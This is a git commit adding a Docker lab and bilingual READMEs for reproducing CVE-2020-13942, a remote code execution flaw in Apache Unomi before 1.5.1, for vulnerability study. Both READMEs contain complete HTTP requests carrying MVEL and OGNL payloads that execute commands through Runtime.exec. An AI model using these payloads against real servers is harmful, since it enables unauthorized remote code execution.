first commit

unomi/CVE-2020-13942/README.md

@@ -0,0 +1,101 @@
+# Apache Unomi Expression Language Injection RCE (CVE-2020-13942)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Unomi is a Java Open Source customer data platform, a Java server designed to manage customers, leads and visitors’ data and help personalize customers experiences.
+
+In the versions prior to 1.5.1, Apache Unomi allowed remote attackers to send malicious requests with MVEL and OGNL expressions that could contain arbitrary classes, resulting in Remote Code Execution (RCE) with the privileges of the Unomi application.
+
+## Environment Setup
+
+Execute following commands to start an Apache Unomi server 1.5.1:
+
+```
+docker compose up -d
+```
+
+After the environment is started, you can access Unomi's API through `http://your-ip:8181` or `https://your-ip:9443`.
+
+## Vulnerability Reproduce
+
+The vulnerability can be triggered through both ports 8181 and 9443.
+
+Execute arbitrary commands through MVEL expressions:
+
+```
+POST /context.json HTTP/1.1
+Host: localhost:8181
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
+Connection: close
+Content-Type: application/json
+Content-Length: 483
+
+{
+    "filters": [
+        {
+            "id": "sample",
+            "filters": [
+                {
+                    "condition": {
+                         "parameterValues": {
+                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/mvel\");"
+                        },
+                        "type": "profilePropertyCondition"
+                    }
+                }
+            ]
+        }
+    ],
+    "sessionId": "sample"
+}
+```
+
+Execute arbitrary commands through OGNL expressions:
+
+```
+POST /context.json HTTP/1.1
+Host: localhost:8181
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
+Connection: close
+Content-Type: application/json
+Content-Length: 1064
+
+{
+  "personalizations":[
+    {
+      "id":"gender-test",
+      "strategy":"matching-first",
+      "strategyOptions":{
+        "fallback":"var2"
+      },
+      "contents":[
+        {
+          "filters":[
+            {
+              "condition":{
+                "parameterValues":{
+                  "propertyName":"(#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\"touch /tmp/ognl\"))",
+                  "comparisonOperator":"equals",
+                  "propertyValue":"male"
+                },
+                "type":"profilePropertyCondition"
+              }
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "sessionId":"sample"
+}
+```
+
+Enter the Docker container, you can see that the command has been executed successfully:
+
+![](1.png)

unomi/CVE-2020-13942/README.zh-cn.md

@@ -0,0 +1,102 @@
+# Apache Unomi 表达式注入远程代码执行漏洞（CVE-2020-13942）
+
+Apache Unomi 是一个基于标准的客户数据平台（CDP，Customer Data Platform），用于管理在线客户和访客等信息，以提供符合访客隐私规则的个性化体验。在Apache Unomi 1.5.1级以前版本中，存在一处表达式注入漏洞，远程攻击者通过MVEL和OGNL表达式即可在目标服务器上执行任意命令。
+
+参考链接：
+
+- https://www.checkmarx.com/blog/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
+- https://github.com/eugenebmx/CVE-2020-13942
+
+## 环境搭建
+
+运行如下命令启动一个Apache Unomi 1.5.1的服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，通过`http://your-ip:8181`或`https://your-ip:9443`即可访问到Unomi的API。
+
+## 漏洞复现
+
+通过8181和9443两个端口均可触发漏洞，以下以8181为例。
+
+通过MVEL表达式执行任意命令：
+
+```
+POST /context.json HTTP/1.1
+Host: localhost:8181
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
+Connection: close
+Content-Type: application/json
+Content-Length: 483
+
+{
+    "filters": [
+        {
+            "id": "sample",
+            "filters": [
+                {
+                    "condition": {
+                         "parameterValues": {
+                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/mvel\");"
+                        },
+                        "type": "profilePropertyCondition"
+                    }
+                }
+            ]
+        }
+    ],
+    "sessionId": "sample"
+}
+```
+
+通过OGNL表达式执行任意命令：
+
+```
+POST /context.json HTTP/1.1
+Host: localhost:8181
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
+Connection: close
+Content-Type: application/json
+Content-Length: 1064
+
+{
+  "personalizations":[
+    {
+      "id":"gender-test",
+      "strategy":"matching-first",
+      "strategyOptions":{
+        "fallback":"var2"
+      },
+      "contents":[
+        {
+          "filters":[
+            {
+              "condition":{
+                "parameterValues":{
+                  "propertyName":"(#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\"touch /tmp/ognl\"))",
+                  "comparisonOperator":"equals",
+                  "propertyValue":"male"
+                },
+                "type":"profilePropertyCondition"
+              }
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "sessionId":"sample"
+}
+```
+
+进入容器，可见命令已执行成功：
+
+![](1.png)

unomi/CVE-2020-13942/docker-compose.yml

@@ -0,0 +1,18 @@
+version: '2'
+services:
+ web:
+   image: vulhub/unomi:1.5.1
+   ports:
+    - "9443:9443"
+    - "8181:8181"
+   environment:
+    - UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200
+   depends_on:
+    - elasticsearch
+ elasticsearch:
+   image: elasticsearch:7.9.3
+   environment:
+    - cluster.name=contextElasticSearch
+    - discovery.type=single-node
+    - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
+    - bootstrap.memory_lock=true